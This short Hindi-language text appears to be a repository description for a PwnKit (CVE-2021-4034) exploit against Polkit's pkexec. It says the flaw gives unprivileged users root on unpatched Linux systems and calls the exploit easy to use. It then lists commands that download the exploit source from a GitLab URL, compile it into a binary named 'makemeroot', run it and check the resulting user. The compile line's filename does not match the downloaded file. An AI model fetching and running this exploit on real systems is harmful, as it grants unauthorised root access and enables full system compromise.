
स्थानीय विशेषाधिकार वृद्धि शोषण CVE-2021-4034 (PWNKIT) के लिए, जो Polkit के pkexec को लक्षित करता है, जिससे अविशेषाधिकृत उपयोगकर्ता कमजोर Linux सिस्टम पर root प्राप्त कर सकते हैं।
CVE-2021-4034 (PWNKIT)
Polkit के pkexec में एक मेमोरी भ्रष्टाचार भेद्यता, जो किसी भी अन-प्रिविलेज्ड उपयोगकर्ता को डिफ़ॉल्ट polkit कॉन्फ़िगरेशन का उपयोग करके एक भेद्य सिस्टम पर पूर्ण रूट विशेषाधिकार प्राप्त करने की अनुमति देती है।
उपयोग में आसान, किसी भी गैर-पैच किए गए लिनक्स सिस्टम पर स्थानीय विशेषाधिकार वृद्धि।
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami